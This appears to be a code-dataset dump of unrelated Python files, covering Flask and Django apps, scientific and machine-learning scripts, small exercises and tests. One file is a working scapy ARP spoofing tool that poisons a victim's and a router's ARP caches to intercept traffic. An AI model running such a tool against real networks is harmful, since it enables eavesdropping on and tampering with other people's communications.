text stringlengths 38 1.54M |
|---|
from flask import Flask, render_template, request, redirect, session
app = Flask(__name__)
app.secret_key= 'lalalala'
@app.route('/')
def index():
return render_template("index.html")
@app.route('/process', methods=['POST'])
def process():
session['raspberry']= request.form['raspberry']
session['apple']= request.form['apple']
session['strawberry']= request.form['strawberry']
session['first_name']= request.form['first_name']
session['last_name']= request.form['last_name']
session['student_id']= request.form['student_id']
session['count']= int(session['strawberry'])+int(session['apple'])+int(session['raspberry'])
return redirect('/checkout')
@app.route('/checkout')
def checkout():
return render_template("checkout.html", raspberry=session['raspberry'], apple=session['apple'],strawberry=session['strawberry'], first_name=session['first_name'], last_name=session['last_name'], student_id=session['student_id'], count=session['count'])
@app.route('/fruits')
def fruits():
return render_template("fruits.html")
if __name__=="__main__":
app.run(debug=True) |
# calculate mass fraction of stars and total mass in galaxies of mass >M* and halos of mass >M
# it uses Sheth et al. halo mass function to calculate mass fraction of total mass
#
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
from scipy import interpolate as intp
from scipy import integrate
import math
#
# prepare stellar mass function fit
#
lms = np.arange(3.0,13.5,0.1) # grid of stellar masses
ms = 10.0**lms
#
# Baldry et al. 2012 stellar mass function for small M*
#
lmstar = 10.66
phi1s = 3.96e-3; alpha1=-0.35; phi2s = 6.9e-4; alpha2=-1.57;
mstar = 10.**lmstar; mus = ms/mstar
dnms1 = np.exp(-mus)*(phi1s*mus**alpha1 + phi2s*mus**alpha2)/mstar
#
# using Bernardi et al. 2013 double Schechter fit for large M*
#
mstarb = 0.0094e9; phisb = 1.040e-2; alphab = 1.665; betab = 0.255
phisg = 0.675e-2; mstarg = 2.7031e9; gammag = 0.296
gammanorm = math.gamma(alphab/betab)
musb = ms/mstarb; musg = ms/mstarg
dnms2 = (phisb*np.exp(-musb**betab)*musb**(alphab-1)/(mstarb)*betab/gammanorm +
phisg*musg**(gammag-1)*np.exp(-musg)/mstarg)
#
# multiply by M* to get dn/dlnM and take maximum
# of Baldry et al. and Bernardi et al stellar mass functions to construct the composite
#
dnms1 = dnms1*ms; dnms2 = dnms2*ms
dnms = np.maximum(dnms1,dnms2)
ldnms = np.log10(dnms) + lms # multiply one more time by M* to integrate in log10(M)
sdnms = intp.UnivariateSpline(lms, ldnms, s=0.0)
def sifunc(logms):
return 10.0**(sdnms(logms))
si1 = integrate.quadrature(sifunc,lms[0],lms[-1])[0]
sfrac = np.zeros_like(lms); si2 = np.zeros_like(lms)
for i, lmsd in enumerate(lms):
si2[i] = integrate.quadrature(sifunc,lmsd,lms[-1])[0]
sfrac[i]=si2[i]/si1
#print lmsd, sfrac[i]
#
nmspl = intp.UnivariateSpline(lms,10.**(np.log10(dnms)+lms), s=0.0)
nmstot = nmspl.integral(lms[0],np.inf)
for lmsd in lms:
nmsm = nmspl.integral(lmsd,np.inf)
#print "log10 M* = %.2f"%lmsd, "frac(>M*)=%.5f"%(nmsm/nmstot)
#
# now mass functions
#
#
# read power spectrum
#
fname = 'matter_power_kmax10000.dat'
k, Pk = np.loadtxt(fname,usecols=(0,1),unpack=True)
#
# set relevant cosmological parameters
#
h = 0.7; Omega_m = 0.276; rho_mean = 2.77e11*h*h*Omega_m # in Msun/Mpc^3
#
# set a desired grid of masses and corresponding radii
#
lM = np.arange(1.0,16,0.1)
M = 10.0**lM; R = (3.0*M/(4.0*math.pi*rho_mean))**(1.0/3.0)
# check if the mass limits and k limits are appropriate (see e.g. Murray et al. arxiv/1306.6721)
if not ((k[0]*R[-1]<0.1) and (k[-1]*R[0]>3.0)):
raise ValueError("***WARNING! limits on k and R(M) will result in accurate sigma!***")
def W2(k,R):
kR = k*R
return (3.0*(np.sin(kR)-kR*np.cos(kR))/(kR**3))**2
def dW2dM(k,R):
kR = k*R
return (np.sin(kR)-kR*np.cos(kR))*(np.sin(kR)*(1.0-3.0/(kR**2))+3.0*np.cos(kR)/kR)
sig = np.zeros_like(M)
factor1 = 0.5/math.pi**2
for i, md in enumerate(M):
sfunc = Pk*W2(k,R[i])*k*k
sig[i] = np.sqrt(factor1*integrate.simps(sfunc,k))
#
# now compute dln(sigma)/dlnM
#
dsdm = np.zeros_like(M)
factor2 = 1.5/math.pi**2
for i, md in enumerate(M):
sfunc = Pk*dW2dM(k,R[i])/(k**2)
spl = intp.UnivariateSpline(k, sfunc, s=0.0)
dsdm[i] = factor2*spl.integral(k[0],np.inf)/sig[i]**2/R[i]**4
lsig = np.log(sig); logm = np.log(M);
#
# renormalize sigma(M) to a desired sigma8
#
#
sR = intp.UnivariateSpline(R, sig, s=0.0)
R8 = 8.0/h; sig8 = sR(R8)
sig8new = 0.8
print "sigratio =", sig8new/sig8
sig = sig*sig8new/sig8
#
# mass function
#
def f_PS(nu):
return np.sqrt(2.0/math.pi)*np.exp(-0.5*nu**2)
def f_SMT(nu):
nup2 = (0.840833*nu)**2
return 0.644*(1.0+1.0/nup2**0.3)*np.sqrt(nup2*0.5/math.pi)*np.exp(-0.5*nup2)
# define peak height
delc = 1.69; nu = delc/sig
#
# compute mass-functions in the Press-Schechter 1974 and Sheth et al. 2001 approximations
#
dndlnM_PS = rho_mean/M*abs(dsdm)*nu*f_PS(nu)
dndlnM_SMT = rho_mean/M*abs(dsdm)*nu*f_SMT(nu)
# function to integrate for mass fractions in ln(nu)
dni = f_SMT(nu)
lnu = np.log(nu)
slmf = intp.UnivariateSpline(lnu,np.log10(dni),s=0.0)
def mfunci(lnud):
return 10.0**slmf(lnud)
hi1 = integrate.quadrature(mfunci,lnu[0],lnu[-1])[0]
hfrac = np.zeros_like(logm); hi2 = np.zeros_like(logm)
for i, lnud in enumerate(lnu):
hi2[i] = integrate.quadrature(mfunci,lnud,lnu[-1])[0]
hfrac[i]=hi2[i]/hi1
#print lM[i], hfrac[i], hi1, hi2[i]
#
# plot
#
fig1 = plt.figure()
plt.rc('text', usetex=True)
plt.rc('font',size=16,**{'family':'sans-serif','sans-serif':['Helvetica']})
plt.rc('xtick.major',pad=10); plt.rc('xtick.minor',pad=10)
plt.rc('ytick.major',pad=10); plt.rc('ytick.minor',pad=10)
plt.xscale('log'); #plt.yscale('log')
plt.plot(ms,si2/si1,linewidth=1.5,c='b',label='stellar mass frac. $>M_*$')
plt.plot(M,hfrac,linewidth=1.5,c='magenta',label='total mass frac. $>M_{\\rm tot}$')
plt.xlabel('$\\log_{10} M_*, M_{\\rm tot}$')
plt.ylabel('fraction of mass at $>M$')
plt.title('fraction of mass')
plt.legend(loc='lower left')
plt.show()
|
"""Mixture model for matrix completion"""
from typing import Tuple
import numpy as np
from scipy.special import logsumexp
from common import GaussianMixture
import naive_em
def estep(X: np.ndarray, mixture: GaussianMixture) -> Tuple[np.ndarray, float]:
"""E-step: Softly assigns each datapoint to a gaussian component
Args:
X: (n, d) array holding the data, with incomplete entries (set to 0)
mixture: the current gaussian mixture
Returns:
np.ndarray: (n, K) array holding the soft counts
for all components for all examples
float: log-likelihood of the assignment
"""
rated = (X != 0).astype(np.float)
d = np.sum(rated, axis=1)[:,None]
f = np.log(np.ones(d.shape) * mixture.p + 1e-16) - \
d * (np.log(2 * np.pi) + np.log(np.ones(d.shape) * mixture.var))/2 - \
np.linalg.norm(X[:, None, :] - rated[:, None, :] * mixture.mu, axis=2) ** 2 / (2 * mixture.var[None, :])
f_max = np.max(f, axis=1, keepdims=True)
l = f - (f_max + logsumexp(f - f_max, axis=1, keepdims=True))
post = np.exp(l)
if (~np.isfinite(post)).any():
hold=1
ll = np.sum(post * (f_max + logsumexp(f - f_max, axis=1, keepdims=True)))
return post, ll
def mstep(X: np.ndarray, post: np.ndarray, mixture: GaussianMixture,
min_variance: float = .25) -> GaussianMixture:
"""M-step: Updates the gaussian mixture by maximizing the log-likelihood
of the weighted dataset
Args:
X: (n, d) array holding the data, with incomplete entries (set to 0)
post: (n, K) array holding the soft counts
for all components for all examples
mixture: the current gaussian mixture
min_variance: the minimum variance for each gaussian
Returns:
GaussianMixture: the new gaussian mixture
"""
n = X.shape[0]
d = X.shape[1]
K = post.shape[1]
rated = (X != 0).astype(np.float)[:, None, :]
p = 1 / post.shape[1] * np.ones(post.shape[1])
p_j_i = mixture.p * post / np.sum(mixture.p * post, axis=1)[:,None]
p = np.sum(p_j_i, axis=0) / n
#p = p/np.sum(p, axis=0)
mu_mask = (np.sum(rated*p_j_i[:,:,None], axis=0) >= 1.)
if ~(np.isfinite(np.sum(X[:,None,:] * rated*p_j_i[:,:,None], axis=0)).all()) or (np.sum(rated*p_j_i[:,:,None], axis=0) * mu_mask).any() == 0:
hold=1
delta = np.sum(rated, axis=2)
mu_new = (np.sum(p_j_i[:,:,None] * delta[:,:,None] * X[:,None,:], axis=0) / np.sum(p_j_i*delta, axis=0)[:,None]) * mu_mask
mu_old = mixture.mu * (mu_mask == 0)
mu = mu_new + mu_old
var = np.sum(p_j_i * (np.linalg.norm(X[:,None,:] - rated * mu, axis=2) ** 2), axis=0) / \
np.sum(np.sum(rated*p_j_i[:,:,None], axis=0), axis=1)
if (~np.isfinite(mu)).any():
hold=1
if (~np.isfinite(var)).any():
hold=1
if (~np.isfinite(p)).any():
hold=1
return GaussianMixture(mu, np.maximum(var, min_variance), p)
def run(X: np.ndarray, mixture: GaussianMixture,
post: np.ndarray) -> Tuple[GaussianMixture, np.ndarray, float]:
"""Runs the mixture model
Args:
X: (n, d) array holding the data
post: (n, K) array holding the soft counts
for all components for all examples
Returns:
GaussianMixture: the new gaussian mixture
np.ndarray: (n, K) array holding the soft counts
for all components for all examples
float: log-likelihood of the current assignment
"""
old_ll = None
ll = None
while old_ll is None or ll - old_ll > 1e-6*np.absolute(ll):
old_ll = ll
post, ll = estep(X, mixture)
mixture = mstep(X, post, mixture)
return mixture, post, ll
def fill_matrix(X: np.ndarray, mixture: GaussianMixture) -> np.ndarray:
"""Fills an incomplete matrix according to a mixture model
Args:
X: (n, d) array of incomplete data (incomplete entries =0)
mixture: a mixture of gaussians
Returns
np.ndarray: a (n, d) array with completed data
"""
rated = (X != 0).astype(np.float)
d = np.sum(rated, axis=1)[:,None]
f = np.log(np.ones(d.shape) * mixture.p + 1e-16) - \
d * (np.log(2 * np.pi) + np.log(np.ones(d.shape) * mixture.var))/2 - \
np.linalg.norm(X[:, None, :] - rated[:, None, :] * mixture.mu, axis=2) ** 2 / (2 * mixture.var[None, :])
f_max = np.max(f, axis=1, keepdims=True)
l = f - (f_max + logsumexp(f - f_max, axis=1, keepdims=True))
post = np.exp(l)
d = X.shape[1]
output = np.sum((1 / ((2 * np.pi * mixture.var) ** (d / 2)) * np.exp(-(X- mixture.mu) ** 2 / (2 * mixture.var)))[:,None,:] * post, axis=1)
#output = post*
#output += post*(X==0)
return output |
import torch
import numpy as np
from torch.nn.parameter import Parameter
from torch.nn import functional as F
from torch import cuda
import torch.nn as nn
import torch.nn.modules as modules
from source.functional.max_sv import max_singular_value
class SNLinear(nn.Linear):
def __init__(self, in_features, out_features, bias=True,
use_gamma=False, Ip=1, factor=None):
self.Ip = Ip
self.use_gamma = use_gamma
self.factor = factor
super(SNLinear, self).__init__(in_features, out_features, bias)
# todo
# self.u = np.random.normal(size=(1, out_features)).astype(dtype="f")
self.register_buffer('u', torch.Tensor(1, out_features).normal_())
# self.u = Parameter(torch.Tensor(1, out_features).normal_())
# self.register_persistent('u')
self.reset_parameters()
@property
def W_bar(self):
"""
Spectrally Normalized Weight
:return:
"""
# W_mat = self.weight.reshape(self.weight.shape[0], -1)
sigma, _u, _ = max_singular_value(self.weight, self.u, self.Ip)
if self.factor:
sigma = sigma / self.factor
# todo
sigma = sigma.reshape((1, 1)).expand_as(self.weight)
if self.training :
# Update estimated 1st singular vector
self.u[:] = _u
if hasattr(self, 'gamma'):
return self.gamma.expand_as(self.weight) * self.weight / sigma
else:
return self.weight / sigma
# todo
def reset_parameters(self):
super(SNLinear, self).reset_parameters()
if self.use_gamma:
_, s, _ = np.linalg.svd(self.weight.data)
# todo
self.gamma = Parameter(torch.Tensor(s[0]).reshape((1, 1)))
def forward(self, input):
return F.linear(input, self.W_bar, self.bias)
|
#!/usr/bin/env python
import scapy.all as scapy
import time
import optparse
def get_values():
parser = optparse.OptionParser()
parser.add_option("-t", "--target", dest="targetip", help="IP address of target ------ 5H4D0W-R007 -------")
parser.add_option("-s", "--source", dest="sourceip", help="IP address to be spoofed with ------ 5H4D0W-R007 -------")
(values, attributes) = parser.parse_args()
if not values.targetip and not values.sourceip:
parser.error("[-] use --help for more info")
if not values.targetip:
parser.error("[-] Please specify target IP, use --help for more info")
if not values.sourceip:
parser.error("[-] Please specify source IP, use --help for more info")
return values
def get_mac(ip):
#scapy.arping(ip) -> arp requests directed to broadcast MAC
arp_request = scapy.ARP(pdst = ip) # 1. set IP to pdst field in ARP Class
#scapy.ls(scapy.ARP())
#arp_request.show()
broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff") # 2. set destination MAC to broadcast MAC in Ether Class
#scapy.ls(scapy.Ether())
#broadcast.show()
arp_request_broadcast = broadcast/arp_request # combining frames
#arp_request_broadcast.show()
#print(arp_request.summary())
# srp() returns 2 lists, answered & unanswered
answered_summary, unanswered_summary = scapy.srp(arp_request_broadcast, timeout = 1, verbose = False) #remove extra details
#print(answered_summary.summary())
return answered_summary[0][1].hwsrc #1st element`s IP
def spoof(target_ip,spoof_ip):
#scapy.ls(scapy.ARP)
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
#op=1->request packet
#pdst,hwdst is IP and MAC of target
#psrc=IP of router/AP
# print(packet.show())
# print(packet.summary())
scapy.send(packet, verbose=False)
#packet to be sent, we only want custom output to be displayed
def restore(destination_ip, source_ip):
# To restore the ARP table
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False)
values = get_values()
targetip = values.targetip
sourceip = values.sourceip
counter_packets = 0
try:
while 1:
spoof(targetip,sourceip) #to victim
spoof(sourceip,targetip) #to router
counter_packets = counter_packets+2
print("\r[+] "+str(counter_packets)+" packets sent",end="") # To print in same line
#sys.stdout.flush()
time.sleep(2)
except KeyboardInterrupt:
print("\n[-] Detected an interrupt. Resetting ARP tables...")
time.sleep(2)
print("[-] Quitting...")
restore(targetip, sourceip) #restore victim`s ARP table\
restore(sourceip, targetip) #restore router`s ARP table
|
"""
Django settings for mentor project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
import os
import pymysql
from fnmatch import fnmatch
from varlet import variable
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
pymysql.install_as_MySQLdb()
# set this to false in dev
DEBUG = variable("DEBUG", False)
TEMPLATE_DEBUG = DEBUG
# a list of 2-tuples containing a name and email address. No need to set in dev
ADMINS = variable("ADMINS", [("John Doe", "foo@example.com")])
# the default is safe to use
SECRET_KEY = variable("SECRET_KET", os.urandom(64).decode("latin1"))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
# database name
'NAME': variable("DB_NAME", 'mentor'),
# DB username. The default is fine for dev
'USER': variable("DB_USER", "root"),
# DB password. The default is fine for dev
'PASSWORD': variable("DB_PASSWORD", ''),
# DB host. The default is fine for dev
'HOST': variable("DB_HOST", ''),
}
}
DJANGO_DIR = os.path.normpath(os.path.join(os.path.dirname(__file__)))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.normpath(os.path.join(DJANGO_DIR, "../"))
AUTH_USER_MODEL = 'users.User'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
ALLOWED_HOSTS = ['.pdx.edu'] + (["*"] if DEBUG else [])
TEST_RUNNER = 'mentor.test_runner.TestRunner'
# allow the use of wildcards in the INTERAL_IPS setting
class IPList(list):
# do a unix-like glob match
# E.g. '192.168.1.100' would match '192.*'
def __contains__(self, ip):
for ip_pattern in self:
if fnmatch(ip, ip_pattern):
return True
return False
INTERNAL_IPS = IPList(['10.*', '192.168.*'])
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
# 'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'arcutils',
'permissions',
'mentor.questionaire',
'mentor.users',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# CAS authentication settings
AUTHENTICATION_BACKENDS = (
'arcutils.cas.backends.CASModelBackend',
'django.contrib.auth.backends.ModelBackend',
)
ROOT_URLCONF = 'mentor.urls'
WSGI_APPLICATION = 'mentor.wsgi.application'
# Email domain is used to send email to a user, the address is formed by username@EMAIL_DOMAIN
# EMAIL_FROM is the email address that email will be sent from
# EMAIL_LIST is the email address that email will be sent to inform client (specified by client)
EMAIL_DOMAIN = 'pdx.edu'
EMAIL_FROM = 'mentor_no_reply@pdx.edu'
EMAIL_LIST = 'UNST-MAPS-Group@pdx.edu'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Los_Angeles'
USE_I18N = False
USE_L10N = False
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(DJANGO_DIR, "static"),
)
STATIC_ROOT = os.path.join(BASE_DIR, "static")
MEDIA_URL = '/media/'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
)
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(DJANGO_DIR, "templates"),
)
# The HOST:PORT of the logstash server you want to pipe logs to
LOGSTASH_ADDRESS = variable("LOGSTASH_ADDRESS", "localhost:5000")
LOGGING_CONFIG = 'arcutils.logging.basic'
|
# sort法
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
nums = sorted(nums, reverse = True)
return nums[k-1]
# heap法
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
kth_element = heapq.nlargest(k, nums)[-1]
return kth_element
# 快排法 quicksort
|
n = int(input())
m = int(input())
quantity = []
price = []
for _ in range(m):
quantity.append(float(input()))
_ = input()
for _ in range(m):
price.append(float(input()))
dic = []
for i in range(len(quantity)):
if price[i] > 0:
dic.append((quantity[i], price[i]))
dic = sorted(dic, key=lambda x : x[0])
def solution(n, dic):
if len(dic) == 1:
return dic[0][1]
elif n < dic[0][0]:
small, large = dic[0], dic[1]
slope = (large[1] - small[1])/(large[0] - small[0])
result = (n - small[0]) * slope + small[1]
elif n > dic[-1][0]:
small, large = dic[-2], dic[-1]
slope = (large[1] - small[1]) / (large[0] - small[0])
result = (n - large[0]) * slope + large[1]
else:
for i in range(len(dic)):
if dic[i][0] == n:
return dic[i][1]
for i in range(len(dic)):
if n > dic[i][0]:
large = dic[i+1]
small = dic[i]
slope = (large[1] - small[1]) / (large[0] - small[0])
result = (n - large[0]) * slope + large[1]
if result > 0:
return round(result * 100 + 0.1)/100
else:
return round(result * 100 - 0.1) / 100
print(solution(n,dic))
|
import cv2
import argparse
from tqdm import tqdm
import numpy as np
def main():
args = get_cmd_args()
print('\nRemoving projective distortion from {} using OpenCV builtin methods...\n'
.format(args.input_path))
input_img = cv2.imread(args.input_path)
image_info = get_image_info(input_img, args.verbose)
im_rect_pts = {
'ul' : (450, 55),
'ur' : (760, 175),
'bl' : (430, 430),
'br' : (748, 440)
}
im_corner_vectors = {
'ul' : np.transpose(np.array([im_rect_pts['ul'][0], im_rect_pts['ul'][1], 1])),
'ur' : np.transpose(np.array([im_rect_pts['ur'][0], im_rect_pts['ur'][1], 1])),
'bl' : np.transpose(np.array([im_rect_pts['bl'][0], im_rect_pts['bl'][1], 1])),
'br' : np.transpose(np.array([im_rect_pts['br'][0], im_rect_pts['br'][1], 1]))
}
if args.verbose:
print('\nUser-defined rectangle corner homogenous coordinates: ')
for k, v in im_corner_vectors.items():
print(k, v)
new_origin = [500, 400]
x_scale = 500
y_scale = 300
image_points = np.float32([value[0:2] for key, value in im_corner_vectors.items()])
world_points = np.float32([
new_origin,
[new_origin[0]+x_scale, new_origin[1]],
[new_origin[0], new_origin[1]+y_scale],
[new_origin[0]+x_scale, new_origin[1]+y_scale]
])
print('\nCalculating inverse homography...')
auto_perspective = cv2.getPerspectiveTransform(image_points, world_points)
plot_im_corners(input_img, im_rect_pts)
plot_im_edges(input_img, im_rect_pts)
w = input_img.shape[1]
h = input_img.shape[0]
print('\nApplying inverse homography to input image...')
output_shape = (w*2, h*2)
output_img = cv2.warpPerspective(
input_img,
M=auto_perspective,
dsize=output_shape
)
cv2.imwrite(args.output_path, output_img)
print('\nAll done!')
def plot_im_edges(input_img, rect_points):
line_1 = cv2.line(
input_img,
pt1=rect_points['bl'],
pt2=rect_points['ul'],
color=(0,0,255),
thickness=2
)
line_2 = cv2.line(
input_img,
pt1=rect_points['bl'],
pt2=rect_points['br'],
color=(0,0,255),
thickness=2
)
def plot_im_corners(input_img, rect_points):
cv2.circle(
input_img,
center=rect_points['ul'],
radius=3,
color=(255,0,0),
thickness=3
)
cv2.circle(
input_img,
center=rect_points['ur'],
radius=3,
color=(255,0,0),
thickness=3
)
cv2.circle(
input_img,
center=rect_points['bl'],
radius=3,
color=(255,0,0),
thickness=3
)
cv2.circle(
input_img,
center=rect_points['br'],
radius=3,
color=(255,0,0),
thickness=3
)
def get_image_info(input_img, verbose=False):
image_info = {
'width': input_img.shape[0],
'height': input_img.shape[1],
'channels': input_img.shape[2]
}
if verbose:
print('Input is a {}-channel {}x{} image'
.format(image_info['channels'], image_info['width'], image_info['height']))
return image_info
def get_cmd_args():
parser = argparse.ArgumentParser(
description='Program to remove projective transformations from an image'
)
parser.add_argument(
'-o', '--output',
action='store',
dest='output_path',
required=True,
help='input file'
)
parser.add_argument(
'-i', '--input',
action='store',
dest='input_path',
required=True,
help='output file'
)
parser.add_argument(
'-v', '--verbose',
action='store_true',
dest='verbose',
help='verbose output'
)
args = parser.parse_args()
return args
if __name__ == '__main__':
main()
|
def decorator(f):
def new_function():
print("Extra Functionality")
f()
return new_function
@decorator
def initial_function():
print("Initial Functionality")
initial_function()
class House:
def __init__(self, price):
self._price = price # protected with one underscore
@property
def price(self):
return self._price
@price.setter
def price(self, new_price):
if new_price > 0 and isinstance(new_price, float):
self._price = new_price
else:
print("Please enter a valid price")
@price.deleter
def price(self):
del self._price |
import os.path
import target_distribution_methods
from actions import ParallelScpSendFileAction
def create_action(task, source, filename, target):
return ParallelScpSendFileAction(task, source, filename, target)
target_distribution_methods.register('parallel_scp', create_action)
|
import numpy as np
import pandas as pd
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
def data_operate():
'''
对文件里的数据集进行处理,划分训练集和测试集
'''
label_enoder=LabelEncoder()
onehot_encoder=OneHotEncoder()
np.set_printoptions(suppress=True)#不用科学计数法表示
flowers=np.array(pd.read_csv("iris.csv"))
np.random.shuffle(flowers) #打乱顺序
training_data=flowers[:100,1:5] #训练集的输入
training_label=flowers[:100,5] #训练集的分类
training_label=label_enoder.fit_transform(training_label)
training_label=np.reshape(training_label,(-1,1))
training_label=onehot_encoder.fit_transform(training_label).toarray()
test_data=flowers[100:,1:5] #测试集的输入
test_label=flowers[100:,5] #测试集的分类
test_label=label_enoder.fit_transform(test_label)
test_label=np.reshape(test_label,(-1,1))
test_label=onehot_encoder.fit_transform(test_label).toarray()
return training_data,training_label,test_data,test_label
def sigmoid(n):
return 1/(1+np.exp(0-n))
def BP_NetWorking(training_data,training_label,learn_rate,error):
'''
BP神经网络算法
training_data:训练数据
training_label:类别
learn_rate:学习率
error:误差
'''
#初始化
d=len(training_data[0])#输入神经元个数
q=2*d+1 #隐层神经元个数
l=len(np.array(list(set([tuple(t)for t in training_label]))))#输出层神经元个数
w1=np.random.rand(d,q) #输入层到隐层的权值,4*9,
w2=np.random.rand(q,l) #隐层到输出层的权值,9*3
b1=np.random.rand(1,q)#隐层元素的阈值,1*9
b2=np.random.rand(1,l)#输出层元素的阈值,1*3
#print(type(training_data))
epoch=0
while(True):
Error=[]#累积误差
for i in range (len(training_data)):
#计算当前样本的输出
x1=np.dot(training_data[i:i+1,:],w1)#隐层神经元的输入,1*9
x2=sigmoid(x1-b1) #隐层神经元的输出,1*9
y1=np.dot(x2,w2)#输出层的输入,1*3
y2=sigmoid(y1-b2)#当前样本的输出,1*3
#计算均方误差K
Err=np.dot((y2-training_label[i:i+1,:]),(y2-training_label[i:i+1,:]).T)/2
Error.append(Err)
#计算输出层神经元的梯度项g
g=y2*(np.ones((1,3))-y2)*(training_label[i:i+1,:]-y2)
#计算隐层神经元的梯度项e
a=np.dot(w2,g.T)#9*1
e=x2*(np.ones((1,9))-x2)*a.T #1*9
#print(np.shape(e))
#更新连接权与阈值
w2=w2+learn_rate*np.dot(x2.T,g)#更新隐层到输出层的权值
b2=b2-learn_rate*g #更新输出层的阈值
w1=w1+learn_rate*np.dot(training_data[i:i+1,:].T,e)#更新输入层到隐层的权值
b1=b1-learn_rate*e#更新隐层神经元的阈值
epoch+=1
if(sum(Error)/len(training_data)<error or epoch>50000):
break
return w2,b2,w1,b1#返回连接权和阈值
def test(test_data,test_label,w1,w2,b1,b2):
'''
测试
'''
x1=np.dot(test_data,w1)#隐层神经元的输入,50*9
x2=sigmoid(x1-b1) #隐层神经元的输出,50*9
y1=np.dot(x2,w2)#输出层的输入,50*3
y2=sigmoid(y1-b2)#当前样本的输出,50*3
n_rows=test_label.shape[0]#行
n_cols=test_label.shape[1]#列
OutPut=np.empty(shape=(n_rows,n_cols),dtype=int)
for i in range (n_rows):
for j in range(n_cols):
if(y2[i][j]>0.5):
OutPut[i][j]=1
else:
OutPut[i][j]=0
# print(OutPut)
# print(test_label)
count=0
for i in range(len(OutPut)):
if(OutPut[i]==test_label[i]).all():
count+=1
return count/n_rows
if __name__=='__main__':
training_data,training_label,test_data,test_label=data_operate()
w2,b2,w1,b1=BP_NetWorking(training_data,training_label,0.2,0.001)
#测试
corr_rate=test(test_data,test_label,w1,w2,b1,b2)
print("正确率:{:.2f}%".format(corr_rate*100))
|
import datetime
import pytz
local_time = datetime.datetime.now() - datetime.timedelta(hours=30)
print(local_time)
print(datetime.datetime.now(datetime.timezone.utc))
belarus_time = pytz.timezone("Europe/Minsk")
amsterdam_time = pytz.timezone("Europe/Amsterdam")
belarus_local_time_aware_object = belarus_time.localize(local_time)
print(belarus_time)
print(belarus_local_time_aware_object)
amsterdam_time_from_belarus_time = belarus_local_time_aware_object.astimezone(amsterdam_time)
print(amsterdam_time_from_belarus_time)
|
# Generated by Django 3.1 on 2021-04-30 19:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0003_auto_20210320_2049'),
]
operations = [
migrations.AddField(
model_name='project',
name='url',
field=models.URLField(default='#'),
),
]
|
from random import randint, shuffle
qtd = int(input('Digite a quentidade de alunos presentes na sala: '))
alunos = []
ordem = []
for i in range(0, qtd):
alunos.append(input('Nome do aluno {}: '.format(i+1)))
# De forma manual com randint
while len(ordem) < qtd:
x = randint(0, qtd-1)
if x in ordem:
continue
else:
ordem.append(x)
print('A ordem de apresentações é a seguinte: ')
for i in range(0, qtd):
print('{}ª apresentação: {}'.format(i+1, alunos[ordem[i]]))
# Utilizando shuffle para embaralhar a ordem da lista
shuffle(alunos)
print(alunos)
|
import pytest
from mock import patch
import numpy as np
import crab_analyser.crab_pdf_parser_v2
class TestCrabPDFParser:
@patch("crab_analyser.crab_pdf_parser_v2.CrabPDFParser.extract_age")
@patch("crab_analyser.crab_pdf_parser_v2.CrabPDFParser.get_index_of_age_variable")
def test_process_age(self, mock_get_index, mock_extract_age):
# Arrange
lines = ["Sheet 1"
, "Page 1"
, "Sex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"
, "F 1.1512 1.175 0.4125 24.123 12.123 5 6"
, "Age"
, "Sheet 2"
, "Page 2"
, "5"]
source_location = ""
destination_location = ""
age_list = [5]
length_of_features = 1
age_index = 3
mock_extract_age.return_value = age_list
mock_get_index.return_value = age_index
parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
# Act
ret_val = parser.process_age(length_of_features, lines)
# Assert
assert age_list == ret_val
mock_get_index.assert_called_once_with(lines)
mock_extract_age.assert_called_once_with(length_of_features, age_index)
@patch("crab_analyser.crab_pdf_parser_v2.parser.from_file")
def test_raw_pdf(self, mock_tika_from_file):
# Arrange
raw_file = {"status": "something",
"content": "\n\n\nSheet 1\nPage 1\nSex Length Diameter Height Weight Shucked Weight Viscera Weight Shell Weight"}
mock_tika_from_file.return_value = raw_file
raw_file = raw_file['content'].strip().split('\n')
source_location = "file_input_location"
destination_location = ""
parser = crab_analyser.crab_pdf_parser_v2.CrabPDFParser(source_location, destination_location)
# Act
ret_val = parser.read_raw_pdf()
# Assert
assert ret_val == raw_file
